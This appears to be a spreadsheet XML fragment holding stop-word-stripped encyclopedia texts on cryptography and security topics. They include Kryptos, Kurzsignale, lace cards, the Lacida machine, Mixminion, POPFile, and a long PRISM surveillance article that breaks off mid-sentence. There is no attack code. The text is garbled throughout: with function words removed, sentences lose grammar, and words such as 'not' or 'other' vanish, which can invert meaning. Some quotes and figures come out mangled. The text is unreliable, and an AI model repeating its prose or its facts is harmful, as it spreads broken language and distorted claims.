book "muko secret" four young pupils class naturals learn mysterious sculpture hidden school. hints book suggest sculpture "kryptos". also copiale cipher history cryptography voynich manuscript notes references books jonathan binstock sanborn (2003). atomic time: pure science seduction. isbn 0-88675-072-5. (contains pages kryptos) dunin, elonka (2006). mammoth book secret codes cryptograms. constable robinson. 500. isbn 0-7867-1726-2. dunin, elonka (2009). "kryptos: unsolved enigma". daniel burstein; arne keijzer (eds.). secrets lost symbol: unauthorized guide mysteries behind vinci code sequel. harper collins. 319–326. isbn 978-0-06-196495-4. dunin, elonka (2009). "art, encryption, preservation secrets: interview sanborn". daniel burstein; arne keijzer (eds.). secrets lost symbol: unauthorized guide mysteries behind vinci code sequel. harper collins. 294–300. isbn 978-0-06-196495-4. taylor, greg (2009). "decoding kryptos". john weber (ed.). illustrated guide lost symbol. simon schuster. isbn 978-1-4165-2366-6. journal articles bauer, craig; link, gregory; molle, dante (2016). "james sanborn's kryptos matrix encryption conjecture". cryptologia. (5): 541–552. doi:10.1080/01611194.2016.1141556. s2cid 26592088. conference papers bean, richard (2021). cryptodiagnosis “kryptos k4”. international conference historical cryptology histocrypt. doi:10.3384/ecp183153. articles kryptos 1,735 alphabetical letters "gillogly cracks art", "the kryptos code unmasked", 1999, york times cypherpunks archive "unlocking secret kryptos", march 2000, journal "solving enigma kryptos", january 2005, wired, zetter "interest grows solving cryptic puzzle link vinci code", june 2005, guardian "cracking code", june 2005, mission impossible: code even can't crack external links sanborn's official kryptos webpage sanborn kryptos website maintained elonka dunin (includes kryptos faq, transcript, pictures links) kryptos photos gillogly washington post: cracking code sculpture wired documents reveal cracked kryptos sculpture years before segment (video) kryptos nova sciencenow general services administration kryptos webpage general services administration nexum webpage general services administration indian webpage general services administration binary systems webpage central intelligence agency kryptos webpage national security agency kryptos webpage kryptos project julie (jew-lee) irena lann nicole (monet) friedrich's kryptos observations patrick foster's kryptos page practical introduction brute-force decryption kryptos passages</t>
  </si>
  <si>
    <t>Kurzsignale</t>
  </si>
  <si>
    <t>short signal code, also known short signal book (german: kurzsignalbuch), short code system used kriegsmarine (german navy) world minimize transmission duration messages. description transmission radio messages potential risks revealing submarine's presence direction; decoded content also revealed. submarines need provide information, mostly standard form (position convoy attack submarine, weather information), bases. initially morse code transmissions could used. inhibit detection, duration messages needed minimised; this, kurzsignale short-coding used. prevent interception, messages needed encrypted enigma machine. shorten transmission even further, message could sent fast machine instead human radio operator. example, kurier system implemented time decreased time send morse around milliseconds human millisecond. short signal book kurzsignale code intended shorten transmission time time required directional fix. primarily intended hide signal contents; protection intended achieved encoding enigma machine. copy kurzsignale code book captured german submarine u-110 1941. august 1941, dönitz began addressing u-boats names commanders, instead boat numbers. method defining u-boat meeting points short signal book regarded compromised, method defined b-dienst cryptanalysts disguise positions kriegsmarine german naval grid system (german:gradnetzmeldeverfahren) introduced used radio direction finding aware danger presented radio direction finding (rdf), kriegsmarine developed various systems speed broadcast. kurzsignale code system condensed messages short codes consisting short sequences common terms "convoy location" additional descriptions would needed message. resulting kurzsignal encoded enigma machine subsequently transmitted rapidly possible, typically taking seconds. typical length information weather signal characters.conventional needed minute bearing radio signal, kurzsignale protected this. however, huff-duff system allies could cope short transmissions. fully automated burst transmission kurier system, testing august 1944, could send kurzsignal milliseconds; short enough prevent location even huff-duff and, deployed, would serious setback allied anti-submarine code-breaking activities. late 1944 kurier program priority, ended system operational. short weather cipher similar coding system used weather reports u-boats, wetterkurzschlüssel (short weather cipher). code books captured u-559 october 1942. references</t>
  </si>
  <si>
    <t>Lace card</t>
  </si>
  <si>
    <t>lace card punched card holes punched (also called whoopee card, ventilator card, flyswatter card, doily). they mainly used practical jokes cause disruption card readers. card readers tended lace card inserted, resulting card little structural strength avoid buckling inside mechanism. card punches could also trying produce cards holes punched, owing power-supply problems. when lace card reader, card knife card flat tool used punched card readers card punches) needed clear jam. also black christmas tree packet denial service list practical joke topics notes this article based part jargon file, version 4.2.1, public domain. references</t>
  </si>
  <si>
    <t>Lacida</t>
  </si>
  <si>
    <t>before september 1939the lacida, also called lcd, polish rotor cipher machine. designed produced world poland's cipher bureau prospective wartime polish military higher commands. history machine's name derived surname initials gwido langer, maksymilian ciężki ludomir danilewicz younger brother, leonard danilewicz. built warsaw, cipher bureau's specifications, radio company.in anticipation war, september 1939 invasion poland, lcds sent france. from spring 1941, used polish team polish-, spanish- french-manned cadix radio-intelligence decryption center uzès, near france's mediterranean coast.prior machine's production, never subjected rigorous decryption attempts. decided remedy oversight. early july 1941, polish cryptologists marian rejewski henryk zygalski received lcd-enciphered messages earlier transmitted staff polish commander-in-chief, based london. breaking first message, given cryptologists july took couple hours. further tests yielded similar results. colonel langer suspended cadix. 1974, rejewski explained serious flaws. lacked commutator ("plugboard"), strong points german military enigma machine. lcd's weakness involved reflector wiring. these shortcomings imply lcd, somewhat larger enigma complicated (e.g., switch resetting deciphering), easy solve. indeed, likelihood broken german e-dienst judged slight. theoretically exist, however. also biuro szyfrów (cipher bureau) references further reading władysław kozaczuk, enigma: german machine cipher broken, read allies world two, edited translated christopher kasparek, frederick, university publications america, 1984, isbn 0-89093-547-5. gaj, "polish cipher machine lacida," cryptologia, (1), january 1992, 73–80.</t>
  </si>
  <si>
    <t>Kidde</t>
  </si>
  <si>
    <t>kidde brand division carrier global manufactures distributes fire detection suppression equipment, well smoke alarm units. kidde america's largest manufacturer smoke alarms fire safety products. kidde fire safety north america headquartered mebane, history company founded walter kidde 1917 united states. founder czech ancestry, unrelated danish author harald kidde. 1900s walter kidde founded kidde inc. 1917 $300 savings. 1918 company, known walter kidde company, purchased rights "rich" system; detect fires board ships. 1920s 1923, kidde purchased patent rights siphon device allowed quick release carbon dioxide, improving function fire extinguishers. 1924, company produced first portable carbon dioxide fire extinguisher 1925 installed first built industrial fire extinguishing system. 1926, walter kidde company partnered navy design system protect airplane engines fires. 1930s company established british operation northolt 1935 first overseas operation. company expanded africa, asia, europe south america. 1940s when walter kidde died 1943, john took control company. time, company employed 5,000 people, producing million supplies. 1950s wwii company significant drop sales. 1950s, company diversified machinery tool manufacturing, siphon devices consumer medical uses, aircraft accessories. 1960s–1970s robert dickinson named president company 1961. january 1964, fred sullivan, officer director litton industries, succeeded dickinson president later succeeded john kidde chairman. from 1964 1968, kidde grew million annual revenues $400 million. 1966, kidde named fortune list position 283. 1968 company incorporated kidde company, inc. 1980s 1987, john kidde died. august 1987, kidde purchased $1.7 billion august hanson industries, united states hanson trust united kingdom. august 1988, hanson sold kidde fire protection business pilgrim house group, firm based united kingdom involved electrical products fire protection. included sale walter kidde north america group, fenwal inc., kidde's fire protection group europe. during kidde acquisition process pilgrim house purchased williams holdings plc, industrial management firm. 1989, merged graviner (another williams holdings business) form kidde graviner. 1990s 1990, subsidiary walter kidde aerospace inc. opened production technology center, million. time, kidde products found aircraft stealth bomber 747-400 airliners. 1993, acquired dunford hepburn. february 1997, williams holdings purchased chubb security plc. 2000s march 2000, williams announced breakup company. independent entity, firm adopted name kidde september 2000. october 2000, kidde announced going demerge chubb plc. kidde listed london stock exchange november year.in december 2004, financial times reported kidde "the market leader residential fire protection united states." april 2005, united technologies corporation finalized acquisition kidde place company fire security brand. move joined former sister company chubb security, several brands create fire security. 2009, kidde acquired company firex, owned invensys controls. 2010s april 2013, kidde expanded worry-free product line include ul-listed carbon monoxide (co) alarms. november 2017, u.s. consumer product safety commission issued recall notice models kidde fire extinguishers citing failures discharge correctly used. many 37.8 million extinguishers could covered recall notice. long later march 2018, kidde recalled dual-sensor smoke detector models, pi9010 pi2010. reason recall yellow left sensors could fail alert buyers alarm possible fire. 452,000 units 40,000 units canada affected recall. recall affected units models manufactured september 2016, january 2018. injuries accidents reported yellow recall. 2021, kidde announced recall trusense line alarms alarms detecting smoke fatal levels. locations kidde headquartered mebane, north carolina. kidde canada (formerly pyrene company chubb security) operates kidde fire safety north america located toronto, ontario. kidde fenwal controls division located ashland, massachusetts. kidde aerospace located wilson, north carolina. awards recognition september 2017, kidde ranked among manufacturers carbon monoxide alarms. kidde's fire blanket also ranked "top player" industry global fire blanket market. kidde carbon monoxide alarms included "carbon monoxide alarms industry" report 2017 2022. references external links kidde group global portal kidde brasil kidde fire protection kidde-fenwal kidde poland kidde-czech kidde fire safety europe kidde fire trainers</t>
  </si>
  <si>
    <t>Institut.co</t>
  </si>
  <si>
    <t>institut.co uk-based online non-fungible token (nft) marketplace gallery digital built ethereum blockchain, although uses centralised custody. history institut.co established 2021 kennedy jonny burt, founders contemporary gallery unit london.in september 2021, institut.co launched exhibition nftism; fear trying, curated world commentator kenny schachter, took place stables covent garden, featured work close international artists including krista kim, shells, casey reas, jake chapman, philip colbert, marco brambilla, sarah meyohas.during dubai fair march 2022, institut.co event's biggest sale (88eth, around $230,000), tyler hobbs' work aoi. references external links official website</t>
  </si>
  <si>
    <t>Mixminion</t>
  </si>
  <si>
    <t>mixminion standard implementation type anonymous remailer protocol. mixminion send receive anonymous e-mail. mixminion uses network architecture provide strong anonymity, prevent eavesdroppers attackers linking senders recipients. volunteers servers (called "mixes") receive messages, decrypt them, re-order them, re-transmit toward eventual destination. every e-mail passes several mixes single link message senders recipients. send anonymous message, mixminion breaks uniform-sized chunks (also called "packets"), pads packets uniform size, chooses path network packet. software encrypts every packet public keys server path, one. when time transmit packet, mixminion sends first path. first decrypts packet, learns receive packet, relays eventually, packet arrives final "exit") mix, sends chosen recipient. because sees path besides immediately adjacent mixes, cannot link senders recipients. mixminion supports single-use reply blocks surbs) allow anonymous recipients. surb encodes half-path recipient, sequence unwrap single layer path, encrypt message recipient. when message reaches recipient, recipient decode message learn surb used send sender know recipient received anonymous message. current version mixminion message sender 1.2.7 released february 2009. september 2011, news announcement made stated source uploaded github also anonymity anonymous anonymous remailer cypherpunk anonymous remailer (type mixmaster anonymous remailer (type onion routing (anonymity network) pseudonymous remailer (a.k.a. servers) penet remailer data privacy traffic analysis references external links official website windows frontend mixminion apple osx, macport file mixminion network stats noreply number mixminion nodes</t>
  </si>
  <si>
    <t>Mlecchita vikalpa</t>
  </si>
  <si>
    <t>mlecchita vikalpa arts listed vatsyayana's kamasutra. list appears chapter part kamasutra mlecchita vikalpa appears 44th item list. term mlecchita vikalapa translated english "the understanding writing cypher, writing words peculiar way". introduction mlecchita vikalpa secret writing secret communications. codebreakers, 1967 book david kahn history cryptography, reference mlecchita vikalpa kamasutra cited proof prevalence cryptographic methods ancient india. though kamasutra details methods people time practiced particular form art, later commentators kamasutra described several methods. example, yasodhara jayamangala commentary kamasutra gives descriptions methods known names kautilya muladeviya. ciphers described jayamangala commentary substitution ciphers: kautiliyam letter substitutions based phonetic relations, muladeviya simplified version kautiliyam. there also references methods secret communications like gudhayojya, gudhapada gudhavarna. some modern writers cryptography christened ciphers alluded kamasutra kamasutra cipher vatsyayana cipher.the exact date composition kamasutra fixed. supposed vatsyayana must lived first sixth centuries however, date jayamangla commentary fixed tenth thirteenth centuries kautiliya this mlecchita named kautilya, author ancient indian political treatise, arthashastra. system, short long vowels, anusvara spirants interchanged consonants conjunct consonants. following table shows substitutions used kautiliyam cipher. characters listed table left unchanged. there simplified form scheme known name durbodha. muladeviya another form secret writing mentioned yasodhara's commentary kamasutra known name muladeviya. this existed spoken form written form. written form called gudhalekhya. this form secret communications used kings' spies well traders various geographical locations india. also form secret communications popular among thieves robbers. however, variations actual scheme across various geographical areas. example, erstwhile travancore kingdom, spread part present-day kerala state india, practiced name mulabhadra changes schemes described yashodhara. cipher alphabet muladeviya consists reciprocal specified table below. great indian epic mahabharata contains incident involving type secret talking. duryodhana planning burn pandavas alive made arrangements send pandavas varanavata. vidura resorted secret talk warn yudhishthira dangers front everybody present. only yudhishthira could understand secret message. none others even suspected warning. gudhayojya this elementary trivial method obscuring true content spoken messages popular language game among children. idea unnecessary letters chosen randomly beginning every word sentence. example, obscure sentence "will visit tonight" letters "dis" beginning every word convey message "diswill disvisit disyou distonight" real content intelligible uninitiated pronounced rapidly. also mulabhadra latin references</t>
  </si>
  <si>
    <t>POP before SMTP</t>
  </si>
  <si>
    <t>smtp smtp method authentication used mail server software helps allow users option send e-mail location, long demonstrably also fetch mail place. smtp approach superseded smtp authentication. technically, users allowed smtp address long previously made successful login service mail hosting provider, address, within predefined timeout period. main advantage process generally transparent average user connecting email client, almost always attempted fetch mail sending mail. disadvantages include potentially complex setup mail hosting provider (requiring sort communication channel service smtp service) uncertainty much time users take connect smtp send mail) connecting pop. those users handled method need resort authorization methods. also, cases users come externally controlled dynamically assigned addresses, smtp server must careful giving much leeway allowing unauthorized connections, possibility race conditions leaving open mail relay unintentionally exposed. also simple mail transfer protocol smtp auth, specified 4954 mail submission protocol, specified 6409</t>
  </si>
  <si>
    <t>POPFile</t>
  </si>
  <si>
    <t>popfile free, open-source, cross-platform mail filter originally written perl john graham-cumming maintained team volunteers. uses naive bayes classifier filter mail. this allows filter "learn" classify mail according user's preferences. typically used filter spam mail. also used sort mail user defined "buckets" categories example, user define bucket work email sorted. program works several different modes. popular mode, sets proxy email client pop3 server. mail downloaded pop3, filter identifies classifies mail makes user defined modification subject line, appending name appropriate bucket. user sets rules mail client sort mail based subject line modification. html based interface used instruct popfile, allowing users correct errors classifications thus train system sensitive user's specific requirements. alternative subject-line modification supplement it), system also configured custom mail headers instead. another possible mode, popfile work imap client monitors imap server incoming mail also messages moved user. incoming emails categorized immediately moved folder corresponding categorization. train popfile mode, user needs move message correct folder, i.e. folder popfile moved message. external links popfile official website popfile sourceforge real time global popfile statistics install popfile</t>
  </si>
  <si>
    <t>PRISM</t>
  </si>
  <si>
    <t>prism code name program united states national security agency (nsa) collects internet communications various u.s. internet companies. program also known sigad us-984xn. prism collects stored internet communications based demands made internet companies google section fisa amendments 2008 turn data match court-approved search terms. among things, prism requests target communications encrypted traveled across internet backbone, focus stored data telecommunication filtering systems discarded earlier, data easier handle.prism began 2007 wake passage protect america bush administration. program operated supervision u.s. foreign intelligence surveillance court (fisa court, fisc) pursuant foreign intelligence surveillance (fisa). existence leaked years later contractor edward snowden, warned extent mass data collection greater public knew included characterized "dangerous" "criminal" activities. disclosures published guardian washington post june 2013. subsequent documents demonstrated financial arrangement nsa's special source operations (sso) division prism partners millions dollars.documents indicate prism "the number source intelligence used analytic reports", accounts nsa's internet traffic acquired fisa section authority." leaked information came revelation fisa court ordering subsidiary telecommunications company verizon communications turn logs tracking customers' telephone calls nsa.u.s. government officials disputed criticisms prism guardian washington post articles defended program, asserting cannot used domestic targets without warrant. additionally claiming program helped prevent acts terrorism, receives independent oversight federal government's executive, judicial legislative branches. june 2013, u.s. president barack obama, visit germany, stated nsa's data gathering practices constitute circumscribed, narrow system directed able protect people." media disclosure prism prism publicly revealed classified documents program leaked journalists washington post guardian edward snowden time contractor visit hong kong. leaked documents included powerpoint slides, four published news articles.the documents identified several technology companies participants prism program, including microsoft 2007, yahoo! 2008, google 2009, facebook 2009, paltalk 2009, youtube 2010, 2011, skype 2011 apple 2012. speaker's notes briefing document reviewed washington post indicated percent prism production based yahoo, google, microsoft".the slide presentation stated much world's electronic communications pass u.s., electronic communications data tend follow least expensive route rather physically direct route, bulk world's internet infrastructure based united states. presentation noted facts provide united states intelligence analysts opportunities intercepting communications foreign targets electronic data pass united states.snowden's subsequent disclosures included statements government agencies united kingdom's gchq also undertook mass interception tracking internet communications data described germany "nightmarish" true allegations engaged "dangerous" "criminal" activity "hacking" civilian infrastructure networks countries "universities, hospitals, private businesses", alleged compliance offered limited restrictive effect mass data collection practices (including americans) since restrictions "are policy-based, technically based, change time", adding "additionally, audits cursory, incomplete, easily fooled fake justifications", numerous self-granted exceptions, policies encourage staff assume benefit doubt cases uncertainty. slides below number slides released edward snowden showing operation processes behind prism program. "faa" referred section fisa amendments ("faa"), federal aviation administration, widely known initialism. french newspaper monde disclosed prism slides (see pages coming "prism/us-984xn overview" presentation october 2013. british newspaper guardian disclosed prism slides (see pages november 2013 hand compares prism upstream program, hand deals collaboration nsa's threat operations center fbi. program prism program special source operations (sso) division nsa, tradition nsa's intelligence alliances, cooperates many trusted u.s. companies since 1970s. prior program, terrorist surveillance program, implemented wake september attacks george bush administration widely criticized challenged illegal, include warrants obtained foreign intelligence surveillance court. prism authorized foreign intelligence surveillance court.prism enabled president bush protect america 2007 fisa amendments 2008, immunizes private companies legal action cooperate u.s. government agencies intelligence collection. 2012 renewed congress president obama additional five years, december 2017. according register, fisa amendments 2008 "specifically authorizes intelligence agencies monitor phone, email, communications u.s. citizens week without obtaining warrant" parties outside u.s.the detailed description prism program found report nsa's collection efforts section faa, released privacy civil liberties oversight board (pclob) july 2014.according report, prism used collect internet communications, telephone conversations. these internet communications collected bulk, targeted way: communications specific selectors, like e-mail addresses, gathered. under prism, there's collection based upon keywords names.the actual collection process done data intercept technology unit (ditu) fbi, behalf sends selectors u.s. internet service providers, previously served section directive. under directive, provider legally obliged hand ditu) communications selectors provided government. ditu sends communications nsa, stored various databases, depending type. data, content metadata, already collected prism program, searched non-us person identifiers. these kinds queries became known "back-door searches" conducted nsa, cia. each agencies slightly different protocols safeguards protect searches person identifier. extent program internal presentation slides included various media disclosures show could unilaterally access data perform "extensive, in-depth surveillance live communications stored information" examples including email, video voice chat, videos, photos, voice-over-ip chats (such skype), file transfers, social networking details. snowden summarized general, reality this: nsa, fbi, cia, dia, etc. analyst access query sigint [signals intelligence] databases, enter results anything want."according washington post, intelligence analysts search prism data using terms intended identify suspicious communications targets analysts suspect least percent confidence u.s. citizens, process, communication data u.s. citizens also collected unintentionally. training materials analysts tell periodically report accidental collection non-foreign u.s. data, "it's nothing worry about."according guardian, access chats emails hotmail.com skype microsoft "developed surveillance capability deal" interception chats, "for prism collection microsoft email services unaffected prism collects data prior encryption."also according guardian's glenn greenwald even low-level analysts allowed search listen communications americans people without court approval supervision. greenwald said level analysts can, systems like prism, "listen whatever emails want, whatever telephone calls, browsing histories, microsoft word documents. done need court, need even supervisor approval part analyst."he added databank, years collected communications, allows analysts search database listen calls read emails everything stored, look browsing histories google search terms entered, also alerts activity people connected email address address future." greenwald referring context foregoing quotes program xkeyscore. prism overview responses disclosures united states government executive branch life shortly publication reports guardian washington post, united states director national intelligence, james clapper, june 2013, released statement confirming nearly years government united states using large internet services companies facebook collect information foreigners outside united states defense national security threats. statement read part, "the guardian washington post articles refer collection communications pursuant section foreign intelligence surveillance act. they contain numerous inaccuracies." went say, "section provision fisa designed facilitate acquisition foreign intelligence information concerning non-u.s. persons located outside united states. cannot used intentionally target u.s. citizen, u.s. person, anyone located within united states." clapper concluded statement stating, "the unauthorized disclosure information important entirely legal program reprehensible risks important protections security americans." march 2013, clapper told united states senate select committee intelligence "not wittingly" collect type data millions hundreds millions americans. clapper later admitted statement made march 2013, lie, words responded thought truthful, least untruthful manner saying no."on june 2013, u.s. president barack obama, referring prism program nsa's telephone calls logging program, said, "what programs originally authorized congress, repeatedly authorized congress. bipartisan majorities approved them. congress continually briefed conducted. there whole range safeguards involved. federal judges overseeing entire program throughout." also said, "you can't percent security also percent privacy zero inconvenience. know, we're going make choices society." separate statements, senior obama administration officials (not mentioned name source) said congress briefed times programs since 2009.on june 2013, director national intelligence clapper made additional public statement prism released fact sheet providing information program, described internal government computer system used facilitate government's statutorily authorized collection foreign intelligence information electronic communication service providers court supervision, authorized section foreign intelligence surveillance (fisa) u.s.c. 1881a)." fact sheet stated "the surveillance activities published guardian washington post lawful conducted authorities widely known discussed, fully debated authorized congress." fact sheet also stated "the united states government unilaterally obtain information servers u.s. electronic communication service providers. information obtained fisa court approval knowledge provider based upon written directive attorney general director national intelligence." said attorney general provides fisa court rulings semi-annual reports prism activities congress, "provid[ing] unprecedented degree accountability transparency." democratic senators udall wyden, serve u.s. senate select committee intelligence, subsequently criticized fact sheet inaccurate. director general keith alexander acknowledged errors, stating fact sheet "could precisely described" requirements governing collection e-mail internet content companies. fact sheet withdrawn nsa's website around june 26.in closed-doors senate hearing around june director robert mueller said snowden's leaks caused "significant harm nation safety." senate hearing, director alexander defended program. alexander's defense immediately criticized senators udall wyden, said evidence programs produced "uniquely valuable intelligence." joint statement, wrote, "gen alexander's testimony yesterday suggested nsa's bulk phone records collection program helped thwart 'dozens' terrorist attacks, plots mentioned appear identified using collection methods."on june director alexander said open hearing house intelligence committee congress communications surveillance helped prevent potential terrorist attacks worldwide least involving terrorism suspects targets united states) 2001 2013, prism traffic surveillance program contributed percent cases. according court records, example alexander gave regarding thwarted attack qaeda york stock exchange fact foiled surveillance. several senators wrote director national intelligence clapper asking provide examples.u.s. intelligence officials, speaking condition anonymity, told various news outlets june already seeing said evidence suspected terrorists begun changing communication practices order evade detection surveillance tools disclosed snowden. legislative branch contrast swift forceful reactions previous allegations government conducting surveillance united states citizens' telephone records, congressional leaders initially little prism program leaked information program published. several lawmakers declined discuss prism, citing top-secret classification, others said aware program. after statements released president director national intelligence, lawmakers began comment: senator john mccain (r-az) june 2013, passed patriot act. passed specific provisions allowed program take place, enacted operation."senator dianne feinstein (d-ca), chair senate intelligence committee june "these programs within law," "part obligation keeping americans safe," "human intelligence going it." june "here's rub: instances produced good—has disrupted plots, prevented terrorist attacks, classified, that's what's hard this." june went fine. asked (keith alexander) declassify things would helpful (for people lawmakers better understand intelligence programs). i've information gets declassified. sure people find interesting."senator rand paul (r-ky) june "i'm going seeing challenge supreme court level. going asking internet providers phone companies: customers join class-action lawsuit."senator susan collins (r-me), member senate intelligence committee past member homeland security committee june had, along lieberman, monthly threat briefing, access highly compartmentalized information" "how know program exists?"representative sensenbrenner (r-wi), principal sponsor patriot june "this well beyond patriot allows." "president obama's claim 'this transparent administration history' proven false. fact, appears administration ever peered closely intimately lives innocent americans."representative mike rogers (r-mi), chairman permanent select committee intelligence. june "one things we're charged keeping america safe keeping civil liberties privacy intact. think done particular case." june "within last years program used stop program, excuse stop terrorist attack united states, know that. it's, it's, important, fills little seam used make sure international nexus terrorism event believe ongoing united states. regard valuable thing."senator mark udall (d-co) june think american public knows extent knew extent surveilled data collected. think ought reopen patriot limits amount data national security (agency) collecting. ought remain sacred, there's balance here. that aiming for. let's debate, let's transparent, let's open up."representative todd rokita (r-in) june idea [foreign intelligence surveillance court] meet, idea judgments are."representative luis gutierrez (d-il) june receiving secret briefings asking, know going asking information. want make sure they're harvesting information necessary keep safe simply going everybody's private telephone conversations facebook communications. mean the, know, terrorists debilitate freedom expression privacy."senator wyden (d-or) july feeling administration getting concerned bulk phone records collection, thinking whether move administratively stop think making comeback".following statements lawmakers parties warned national security officials hearing house judiciary committee must change sweeping national security agency surveillance programs face losing provisions foreign intelligence surveillance allowed agency's mass collection telephone metadata. "section expires 2015, unless realize problem, going renewed," rep. sensenbrenner, r-wis., author patriot act, threatened hearing. "it's changed, change operate section 215. otherwise, half years, going anymore." judicial branch leaks classified documents pointed role special court enabling government's secret surveillance programs, members court maintained collaborating executive branch. york times, however, reported july 2013 "more dozen classified rulings, nation's surveillance court created secret body giving national security agency power amass vast collections data americans pursuing terrorism suspects, also people possibly involved nuclear proliferation, espionage cyberattacks." after members u.s. congress pressed foreign intelligence surveillance court release declassified versions secret ruling, court dismissed requests arguing decisions can't declassified contain classified information. reggie walton, current fisa presiding judge, said statement: "the perception court rubber stamp absolutely false. there rigorous review process applications submitted executive branch, spearheaded initially five judicial branch lawyers national security experts, judges, ensure court's authorizations comport applicable statutes authorize." accusation "rubber stamp" rejected walton wrote letter senator patrick leahy: "the annual statistics provided congress attorney general ...—frequently cited press reports suggestion court's approval rate application 99%—reflect number final applications submitted acted court. these statistics reflect fact many applications altered prior final submission even withheld final submission entirely, often indication judge would approve them." u.s. military u.s. military acknowledged blocking access parts guardian website thousands defense personnel across country, blocking entire guardian website personnel stationed throughout afghanistan, middle east, south asia. spokesman said military filtering reports content relating government surveillance programs preserve "network hygiene" prevent classified material appearing unclassified parts computer systems. access washington post, also published information classified surveillance programs disclosed edward snowden, blocked time blocking access guardian reported. responses involvement countries austria former head austrian federal office protection constitution counterterrorism, gert-rené polli, stated knew prism program different name stated surveillance activities occurred austria well. polli publicly stated 2009 received requests intelligence agencies things would violation austrian law, polli refused allow. australia australian government said investigate impact prism program pine surveillance facility privacy australian citizens. australia's former foreign minister carr said australians concerned prism cybersecurity high government's list concerns. australian foreign minister julie bishop stated acts edward snowden treachery offered staunch defence nation's intelligence co-operation united states. brazil brazil's president time, dilma rousseff, responded snowden's reports spied phone calls emails cancelling planned october 2013 state visit united states, demanding official apology, october 2013, come. also, rousseff classified spying unacceptable harsh words speech general assembly september 2013. result, boeing lost us$4.5 billion contract fighter jets sweden's saab group. canada canada's national cryptologic agency, communications security establishment (cse), said commenting prism "would undermine cse's ability carry mandate." privacy commissioner jennifer stoddart lamented canada's standards comes protecting personal online privacy stating fallen behind" report. "while nations' data protection authorities legal power make binding orders, levy hefty fines take meaningful action event serious data breaches, restricted 'soft' approach: persuasion, encouragement and, most, potential publish names transgressors public interest." and, "when push comes shove," stoddart wrote, "short costly time-consuming court battle, power enforce recommendations." european union october 2013 committee european parliament backed measure that, enacted, would require american companies seek clearance european officials complying united states warrants seeking private data. legislation consideration years. vote part efforts europe shield citizens online surveillance wake revelations far-reaching spying program u.s. national security agency. germany france also ongoing mutual talks keep european email traffic going across american servers. france october 2013, french foreign minister, laurent fabius, summoned u.s. ambassador, charles rivkin, quai d'orsay paris protest large-scale spying french citizens u.s. national security agency (nsa). paris prosecutors opened preliminary inquiries program july, fabius said, "... obviously need further" must quickly assure practices repeated." germany germany receive prism data, according reuters report. german chancellor angela merkel said "the internet explain nature program; matthew schofield mcclatchy washington bureau said, "she roundly mocked statement." gert-rené polli, former austrian counter-terrorism official, said 2013 "absurd unnatural" german authorities pretend known anything. german army using prism support operations afghanistan early 2011.in october 2013, reported monitored merkel's cell phone. united states denied report, following allegations, merkel called president obama told spying friends "never acceptable, matter situation." israel israeli newspaper calcalist discussed business insider article possible involvement technologies secretive israeli companies prism program—verint systems narus. mexico after finding prism program, mexican government started constructing spying program citizens. according jenaro villamil, writer proceso, cisen, mexico's intelligence agency started work hewlett packard develop data gathering software. "facebook, twitter, emails social network sites going priority." zealand zealand, university otago information science associate professor hank wolfe said "under unofficially known five eyes alliance, zealand governments, including united states, australia, canada, britain, dealt internal spying saying partners share information."edward snowden, live streamed google hangout dotcom julian assange, alleged received intelligence zealand, listening posts zealand. spain meeting european union leaders held week october 2013, mariano rajoy, spain's prime minister, said "spying activities proper among partner countries allies". october 2013 spanish government summoned american ambassador, james costos, address allegations u.s. collected data million telephone calls spain. separately, íñigo méndez vigo, spanish secretary state, referred need maintain necessary balance" security privacy concerns, said recent allegations spying, proven true, improper unacceptable partners friendly countries". united kingdom united kingdom, government communications headquarters (gchq), also surveillance program, tempora, access prism program june 2010 wrote reports 2012 alone. intelligence security committee parliament reviewed reports gchq produced basis intelligence sought they found case warrant interception place accordance legal safeguards contained law.in august 2013, guardian newspaper's offices visited technicians gchq, ordered supervised destruction hard drives containing information acquired snowden. companies original washington post guardian articles reporting prism noted leaked briefing documents said prism involves collection data "directly servers" several major internet services providers. initial public statements corporate executives several companies identified leaked documents told guardian knowledge prism program particular also denied making information available government scale alleged news reports. statements several companies named leaked documents reported techcrunch washington post follows: microsoft: provide customer data receive legally binding order subpoena never voluntary basis. addition ever comply orders requests specific accounts identifiers. government broader voluntary national security program gather customer data, participate it." yahoo!: "yahoo! takes users’ privacy seriously. provide government direct access servers, systems, network." hundreds millions users serve, infinitesimal percentage ever subject government data collection directive." facebook: provide government organization direct access facebook servers. when facebook asked data information specific individuals, carefully scrutinize request compliance applicable laws, provide information extent required law." google: "google cares deeply security users' data. disclose user data government accordance law, review requests carefully. from time time, people allege created government 'back door' systems, google backdoor government access private user data." "[a]ny suggestion google disclosing information users' internet activity scale completely false." apple: never heard prism" provide government agency direct access servers, government agency requesting customer data must court order." dropbox: "we’ve seen reports dropbox might asked participate government program called prism. part program remain committed protecting users’ privacy."in response technology companies' confirmation able directly access companies' servers, york times reported sources stated gathering surveillance data companies using technical means response court orders specific sets data. washington post suggested, possible conflict prism slides company spokesmen result imprecision part author. another classified report obtained post, arrangement described allowing 'collection managers send] content tasking instructions directly equipment installed company-controlled locations,' rather directly company servers." "[i]n context, 'direct' likely mean receiving data sent deliberately tech companies, opposed intercepting communications they're transmitted destination."if companies received order fisa amendments act, forbidden disclosing received order disclosing information order all," mark rumold, staff attorney electronic frontier foundation, told news.on 2013, google ordered united states district court judge susan illston comply national security letter issued provide user data without warrant. kurt opsahl, senior staff attorney electronic frontier foundation, interview venturebeat said, certainly appreciate google transparency report, appears transparency include this. surprised subject order."the york times reported june 2013, "twitter declined make easier government. companies compliant, according people briefed negotiations." companies held discussions national security personnel make data available efficiently securely. cases, companies made modifications systems support intelligence collection effort. dialogues continued recent months, general martin dempsey, chairman joint chiefs staff, executives including facebook, microsoft, google intel. these details discussions provide insight disparity initial descriptions government program including training slide states, "collection directly servers" companies' denials.while providing data response legitimate fisa request approved fisa court legal requirement, modifying systems make easier government collect data not. this twitter could legally decline provide enhanced mechanism data transmission. other twitter, companies effectively asked construct locked mailbox provide government, people briefed negotiations said. facebook, instance, built system requesting sharing information. google provide lockbox system, instead transmits required data hand delivery ssh. post-prism transparency reports response publicity surrounding media reports data-sharing, several companies requested permission reveal public information nature scope information provided response national security requests. june 2013, facebook reported u.s. government authorized communication "about numbers aggregate, range." press release posted site, company reported, "for months ending december 2012, total number user-data requests facebook received government entities u.s. (including local, state, federal, including criminal national security-related requests) 9,000 10,000." company reported requests impacted "between 18,000 19,000" user accounts, "tiny fraction percent" billion active user accounts.that day, microsoft reported period, received "between 6,000 7,000 criminal national security warrants, subpoenas orders affecting 31,000 32,000 consumer accounts u.s. governmental entities (including local, state federal)" impacted tiny fraction microsoft's global customer base."google issued statement criticizing requirement data reported 